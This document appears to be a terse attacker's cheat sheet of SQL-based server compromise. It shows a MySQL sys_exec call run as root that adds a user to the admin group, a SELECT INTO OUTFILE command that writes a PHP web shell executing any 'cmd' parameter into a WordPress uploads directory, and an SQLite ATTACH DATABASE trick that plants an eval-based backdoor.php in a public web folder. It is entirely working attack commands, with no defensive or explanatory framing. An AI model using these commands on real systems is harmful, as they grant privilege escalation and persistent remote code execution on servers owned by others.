MYSQL
====

mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 98586
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec('usermod -a -G admin john');

+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.08 sec)

mysql> exit


OTHER " shell.php içerisine <?php echo shell_exec($_GET['cmd']);?> satırını ekliyor "
=====================================================================================

mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/xxxx/xxxx/wp-content/uploads/shell.php";


ANOTHER ATTACH DATABASE and RUN COMMAND
=======================================
attach database '/home/devnull/public_html/img/backdoor.php' as backdoor; create table backdoor.tbl (cmd TEXT); insert into backdoor.tbl (cmd) values ("<?php $_REQUEST[e] ? eval( $_REQUEST[e] ) : exit; ?>");


